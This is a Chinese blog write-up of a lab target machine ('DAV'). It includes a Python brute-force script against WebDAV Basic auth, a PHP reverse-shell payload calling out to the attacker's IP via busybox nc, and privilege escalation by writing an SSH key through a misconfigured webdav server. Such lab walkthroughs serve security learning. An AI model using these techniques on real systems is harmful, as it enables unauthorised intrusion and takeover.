<!DOCTYPE html>
<html lang="en" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="author" content="Rufeii" />
  <!-- Open Graph Description 简短摘要-->
  
  <!-- 用于搜索引擎的文章摘要 -->
  
  
  
  <title>
    
      靶机DAV 
      
      
      |
    
     Rufeii
  </title>

  
    <link rel="apple-touch-icon" href="/images/me.jpg">
    <link rel="icon" href="/images/me.jpg">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 7.3.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/me.jpg" alt="">
      
    </a>
    <div class="nickname"><a href="/">Rufeii</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/categories/">
          <a href="/categories/">Categories</a>
        </li>
      
        <li class="nav-item" data-path="/search/">
          <a href="/search/">Search</a>
        </li>
      
        <li class="nav-item" data-path="/links/">
          <a href="/links/">Links</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">靶机DAV</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
          2026-03-12 22:25:57
        </span>
        
              <span class="post-categories">
                <i class="iconfont icon-bookmark" title="Categories"></i>
                
                <span class="span--category">
                  <a href="/categories/%E6%B8%97%E9%80%8F/" title="渗透">
                    <b>#</b> 渗透
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <h2 id="userflag-web打点"><a href="#userflag-web打点" class="headerlink" title="userflag(web打点)"></a>userflag(web打点)</h2><p>端口扫描</p>
<p><img src="/../images/achieve/2026/1/image-20260311185735944.png" alt="image-20260311185735944"></p>
<p>一个80的web服务，还有一个6065的其它服务，后面知道其实是webdav服务，简单来说就是网络文件夹</p>
<p>80端口发现一个子域名：dev.dav.dsz</p>
<p>然后目录扫描没扫除东西</p>
<p><img src="/../images/achieve/2026/1/image-20260311203127559.png" alt="image-20260311203127559"></p>
<p>但是这截图证明是和webdav有关，先放在这！</p>
<p>6065webdav服务，需要http basic认证，直接脚本爆破</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://192.168.3.7:6065/&quot;</span></span><br><span class="line">user = <span class="string">&quot;admin&quot;</span></span><br><span class="line"></span><br><span class="line">password_file = <span class="string">r&quot;C:\Users\MR\Documents\top密码\top1000.txt&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(password_file, <span class="string">&quot;r&quot;</span>, encoding=<span class="string">&quot;utf-8&quot;</span>, errors=<span class="string">&quot;ignore&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    passwords = f.read().splitlines()</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> p <span class="keyword">in</span> passwords:</span><br><span class="line">    auth = <span class="string">f&quot;<span class="subst">&#123;user&#125;</span>:<span class="subst">&#123;p&#125;</span>&quot;</span></span><br><span class="line">    b64 = base64.b64encode(auth.encode()).decode()</span><br><span class="line"></span><br><span class="line">    headers = &#123;</span><br><span class="line">        <span class="string">&quot;Authorization&quot;</span>: <span class="string">f&quot;Basic <span class="subst">&#123;b64&#125;</span>&quot;</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        r = requests.get(</span><br><span class="line">            url,</span><br><span class="line">            headers=headers,</span><br><span class="line">            allow_redirects=<span class="literal">False</span>,</span><br><span class="line">            proxies=&#123;<span class="string">&quot;http&quot;</span>: <span class="literal">None</span>, <span class="string">&quot;https&quot;</span>: <span class="literal">None</span>&#125;,</span><br><span class="line">            timeout=<span class="number">5</span></span><br><span class="line">        )</span><br><span class="line"></span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&quot;<span class="subst">&#123;user&#125;</span>:<span class="subst">&#123;p&#125;</span> -&gt; <span class="subst">&#123;r.status_code&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> r.status_code <span class="keyword">in</span> [<span class="number">200</span>, <span class="number">301</span>, <span class="number">302</span>, <span class="number">207</span>]:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">f&quot;\n[+] SUCCESS FOUND: <span class="subst">&#123;user&#125;</span>:<span class="subst">&#123;p&#125;</span>&quot;</span>)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        <span class="keyword">pass</span></span><br></pre></td></tr></table></figure>

<p>然后就是你爆破毕竟是靠运气吗，所以你字典尽量多弄点，网上查查常见的webdav的默认密码啥的！</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[+] SUCCESS FOUND: admin:qwertyuiop</span><br></pre></td></tr></table></figure>

<p>然后使用cadaver去连接</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">ls                  # 列出目录</span><br><span class="line">cd folder           # 进入子目录</span><br><span class="line">put localfile.txt   # 上传本地文件到服务器</span><br><span class="line">get remotefile.txt  # 下载服务器文件到本地</span><br><span class="line">delete remotefile.txt # 删除服务器文件</span><br><span class="line">mkdir newfolder     # 新建目录</span><br><span class="line">quit                # 退出连接</span><br></pre></td></tr></table></figure>

<p>然后下面拿到两个关键信息</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">dav:/projects/webapp-api/&gt; cat .env.example</span><br><span class="line">DB_HOST=127.0.0.1</span><br><span class="line">DB_USER=dev_user</span><br><span class="line">DB_PASS=P@ssw0rd2026!</span><br><span class="line">AWS_ACCESS_KEY=AKIAIOSFODNN7EXAMPLE</span><br></pre></td></tr></table></figure>

<p>这里有个密码可以尝试ssh密码复用啥的，但是dev_user不行</p>
<p>test文件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="title function_ invoke__">phpinfo</span>(); <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>想着是php文件访问一些发现不解析（这里正常思路就是还要尝试一下其它文件和webdav下的其它目录能不能解析）但是都不行</p>
<p>这里其实就应该将整合起来看，前面那个子域名不也是webdav目录吗（这里打的时候考虑的是通过80端口去文件包含）</p>
<p><img src="/../images/achieve/2026/1/image-20260311204555095.png" alt="image-20260311204555095"></p>
<p>直接覆盖test，写反弹shell就好了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">exec(&quot;busybox nc 192.168.3.6 6666 -e /bin/sh&quot;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h2 id="rootflag-提权"><a href="#rootflag-提权" class="headerlink" title="rootflag(提权)"></a>rootflag(提权)</h2><p>拿到shell之后就开始乱搞，直接linpeas扫一遍，反正无效的操作搞了好久</p>
<p>密码复用ssh连接user</p>
<p><img src="/../images/achieve/2026/1/image-20260311210041195.png" alt="image-20260311210041195"></p>
<p>提权到user再去root</p>
<p><img src="/../images/achieve/2026/1/image-20260311210119164.png" alt="image-20260311210119164"></p>
<p>这个webdav网上没有提权思路，得看它具体命令可以怎么用，其实就是关于搭建webdav服务器的命令。</p>
<p>通过配置文件提权，使用-c参数指定按照配置文件启动webdav，先去看看&#x2F;etc&#x2F;webdav&#x2F;config.yaml</p>
<p><img src="/../images/achieve/2026/1/image-20260311213446520.png" alt="image-20260311213446520"></p>
<p>我们创建一个类型的文件把端口和目录改下</p>
<p><img src="/../images/achieve/2026/1/image-20260311213559700.png" alt="image-20260311213559700"></p>
<p>然后访问</p>
<p><img src="/../images/achieve/2026/1/image-20260311213823119.png" alt="image-20260311213823119"></p>
<p>写入公钥</p>
<p><img src="/../images/achieve/2026/1/image-20260311221745110.png" alt="image-20260311221745110"></p>
<p>然后免密连接</p>
<p><img src="/../images/achieve/2026/1/image-20260311221824324.png" alt="image-20260311221824324"></p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2026/02/22/%E6%B5%85%E6%9E%90CVE-2025-61686-ReactRouter-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%86%99%E5%85%A5%E6%BC%8F%E6%B4%9E/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>Prev</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
              2026-03-12 22:25:57
            </span>
            
                  <span class="post-categories">
                    <i class="iconfont icon-bookmark" title="Categories"></i>
                    
                    <span class="span--category">
                      <a href="/categories/%E6%B8%97%E9%80%8F/" title="渗透">
                        <b>#</b> 渗透
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
              <a href="/2026/03/12/%E9%9D%B6%E6%9C%BAjosJs/" target="_self">
                <span>Next</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#userflag-web%E6%89%93%E7%82%B9"><span class="toc-text">userflag(web打点)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#rootflag-%E6%8F%90%E6%9D%83"><span class="toc-text">rootflag(提权)</span></a></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          
              <a title="github" target="_blank" rel="noopener" href="https://github.com/rufeii/rufeii.github.io">
                <i class="iconfont icon-github"></i>
              </a>
              
        </li>
        
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a href="/">Copyright © 2026 Rufeii</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        


        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + %E9%9D%B6%E6%9C%BADAV + '&url=' + https%3A%2F%2Frufeii.github.io%2F2026%2F03%2F11%2F%25E9%259D%25B6%25E6%259C%25BADAV%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=https://rufeii.github.io/2026/03/11/%E9%9D%B6%E6%9C%BADAV/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
